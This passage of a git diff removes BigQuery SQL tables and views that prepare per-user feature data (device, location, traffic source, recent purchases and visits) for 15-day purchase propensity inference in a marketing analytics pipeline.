BY user_pseudo_id, data_split ORDER BY feature_date DESC) AS user_row_order + FROM `{{project_id}}.{{dataset}}.lead_score_propensity_training_5_1` + WHERE will_{{target_event}} = 1 + ) + WHERE + user_row_order = 1 + LIMIT 100 + ) +; \ No newline at end of file diff --git a/sql/procedure/purchase_propensity_inference_preparation.sqlx b/sql/procedure/purchase_propensity_inference_preparation.sqlx index c848da8d..63194a95 100644 --- a/sql/procedure/purchase_propensity_inference_preparation.sqlx +++ b/sql/procedure/purchase_propensity_inference_preparation.sqlx @@ -627,626 +627,6 @@ CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.purchase_propensity_inferenc FROM `{{project_id}}.{{dataset}}.{{insert_table}}` ); -CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.purchase_propensity_inference_15_15` AS( - SELECT DISTINCT - CURRENT_TIMESTAMP() AS processed_timestamp, - feature_date, - user_pseudo_id, - LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_id, - LAST_VALUE(user_ltv_revenue) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_ltv_revenue, - LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_category, - LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_mobile_brand_name, - LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_mobile_model_name, - LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_os, - LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_language, - LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_web_browser, - LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_sub_continent, - LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_country, - LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_region, - LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_city, - LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_metro, - LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_medium, - LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_name, - LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_source, - LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_medium, - LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_name, - LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_source, - LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS has_signed_in_with_user_id, - LAST_VALUE(active_users_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_1_day, - LAST_VALUE(active_users_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_2_day, - LAST_VALUE(active_users_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_3_day, - LAST_VALUE(active_users_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_4_day, - LAST_VALUE(active_users_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_5_day, - LAST_VALUE(active_users_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_6_day, - LAST_VALUE(active_users_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_7_day, - LAST_VALUE(active_users_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_8_14_day, - LAST_VALUE(purchases_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_1_day, - LAST_VALUE(purchases_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_2_day, - LAST_VALUE(purchases_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_3_day, - LAST_VALUE(purchases_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_4_day, - LAST_VALUE(purchases_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_5_day, - LAST_VALUE(purchases_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_6_day, - LAST_VALUE(purchases_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_7_day, - LAST_VALUE(purchases_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_8_14_day, - LAST_VALUE(visits_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_1_day, - LAST_VALUE(visits_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_2_day, - LAST_VALUE(visits_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_3_day, - LAST_VALUE(visits_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_4_day, - LAST_VALUE(visits_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_5_day, - LAST_VALUE(visits_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_6_day, - LAST_VALUE(visits_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_7_day, - LAST_VALUE(visits_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_8_14_day, - LAST_VALUE(view_items_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_1_day, - LAST_VALUE(view_items_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_2_day, - LAST_VALUE(view_items_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_3_day, - LAST_VALUE(view_items_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_4_day, - LAST_VALUE(view_items_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_5_day, - LAST_VALUE(view_items_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_6_day, - LAST_VALUE(view_items_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_7_day, - LAST_VALUE(view_items_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_8_14_day, - LAST_VALUE(add_to_carts_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_1_day, - LAST_VALUE(add_to_carts_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_2_day, - LAST_VALUE(add_to_carts_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_3_day, - LAST_VALUE(add_to_carts_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_4_day, - LAST_VALUE(add_to_carts_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_5_day, - LAST_VALUE(add_to_carts_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_6_day, - LAST_VALUE(add_to_carts_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_7_day, - LAST_VALUE(add_to_carts_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_8_14_day, - LAST_VALUE(checkouts_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_1_day, - LAST_VALUE(checkouts_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_2_day, - LAST_VALUE(checkouts_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_3_day, - LAST_VALUE(checkouts_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_4_day, - LAST_VALUE(checkouts_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_5_day, - LAST_VALUE(checkouts_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_6_day, - LAST_VALUE(checkouts_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_7_day, - LAST_VALUE(checkouts_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_8_14_day, - FROM `{{project_id}}.{{dataset}}.{{insert_table}}` -); - -CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.purchase_propensity_inference_15_7` AS( - SELECT DISTINCT - CURRENT_TIMESTAMP() AS processed_timestamp, - feature_date, - user_pseudo_id, - LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_id, - LAST_VALUE(user_ltv_revenue) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_ltv_revenue, - LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_category, - LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_mobile_brand_name, - LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_mobile_model_name, - LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_os, - LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_language, - LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS device_web_browser, - LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_sub_continent, - LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_country, - LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_region, - LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_city, - LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS geo_metro, - LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_medium, - LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_name, - LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS last_traffic_source_source, - LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_medium, - LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_name, - LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS first_traffic_source_source, - LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS has_signed_in_with_user_id, - LAST_VALUE(active_users_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_1_day, - LAST_VALUE(active_users_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_2_day, - LAST_VALUE(active_users_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_3_day, - LAST_VALUE(active_users_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_4_day, - LAST_VALUE(active_users_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_5_day, - LAST_VALUE(active_users_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_6_day, - LAST_VALUE(active_users_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_7_day, - LAST_VALUE(active_users_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS active_users_past_8_14_day, - LAST_VALUE(purchases_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_1_day, - LAST_VALUE(purchases_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_2_day, - LAST_VALUE(purchases_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_3_day, - LAST_VALUE(purchases_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_4_day, - LAST_VALUE(purchases_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_5_day, - LAST_VALUE(purchases_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_6_day, - LAST_VALUE(purchases_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_7_day, - LAST_VALUE(purchases_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS purchases_past_8_14_day, - LAST_VALUE(visits_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_1_day, - LAST_VALUE(visits_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_2_day, - LAST_VALUE(visits_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_3_day, - LAST_VALUE(visits_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_4_day, - LAST_VALUE(visits_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_5_day, - LAST_VALUE(visits_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_6_day, - LAST_VALUE(visits_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_7_day, - LAST_VALUE(visits_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS visits_past_8_14_day, - LAST_VALUE(view_items_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_1_day, - LAST_VALUE(view_items_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_2_day, - LAST_VALUE(view_items_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_3_day, - LAST_VALUE(view_items_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_4_day, - LAST_VALUE(view_items_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_5_day, - LAST_VALUE(view_items_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_6_day, - LAST_VALUE(view_items_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_7_day, - LAST_VALUE(view_items_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS view_items_past_8_14_day, - LAST_VALUE(add_to_carts_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_1_day, - LAST_VALUE(add_to_carts_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_2_day, - LAST_VALUE(add_to_carts_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_3_day, - LAST_VALUE(add_to_carts_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_4_day, - LAST_VALUE(add_to_carts_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_5_day, - LAST_VALUE(add_to_carts_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_6_day, - LAST_VALUE(add_to_carts_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_7_day, - LAST_VALUE(add_to_carts_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS add_to_carts_past_8_14_day, - LAST_VALUE(checkouts_past_1_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_1_day, - LAST_VALUE(checkouts_past_2_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_2_day, - LAST_VALUE(checkouts_past_3_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_3_day, - LAST_VALUE(checkouts_past_4_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_4_day, - LAST_VALUE(checkouts_past_5_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_5_day, - LAST_VALUE(checkouts_past_6_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_6_day, - LAST_VALUE(checkouts_past_7_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_7_day, - LAST_VALUE(checkouts_past_8_14_day) OVER(PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS checkouts_past_8_14_day - FROM `{{project_id}}.{{dataset}}.{{insert_table}}` -); - -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_inference_15_15` -(processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day - ) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), - friendly_name="v_purchase_propensity_inference_15_15", - description="View Purchase Propensity Inference dataset using 15 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day -FROM ( - SELECT DISTINCT - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - -- Row number partitioned by user_pseudo_id and ordered by feature_date descending - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_row_order - FROM `{{project_id}}.{{dataset}}.purchase_propensity_inference_15_15` -) -WHERE - -- Filter only for the most recent user example - user_row_order = 1; - - - -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_inference_15_7` -( - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day - ) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL {{expiration_duration_hours}} HOUR), - friendly_name="v_purchase_propensity_inference_15_7", - description="View Purchase Propensity Inference dataset using 15 days back to predict 7 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day -FROM ( -SELECT DISTINCT - processed_timestamp, - feature_date, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - -- Row number partitioned by user_pseudo_id and ordered by feature_date descending - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id ORDER BY feature_date DESC) AS user_row_order - FROM `{{project_id}}.{{dataset}}.purchase_propensity_inference_15_7` -) -WHERE - -- Filter for the most recent user example - user_row_order = 1; - - CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_inference_30_15` (processed_timestamp, feature_date, diff --git a/sql/procedure/purchase_propensity_training_preparation.sqlx b/sql/procedure/purchase_propensity_training_preparation.sqlx index e12ef6f8..a4e8f017 100644 --- 